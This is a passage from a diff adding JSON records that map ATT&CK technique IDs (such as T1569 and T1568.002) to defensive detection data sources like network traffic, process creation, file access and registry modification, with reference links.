as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1052.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive creation", + "description": "A drive was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "drive" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90009" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1569", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ] + ] + }, + { + "technique_id": "T1568.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or 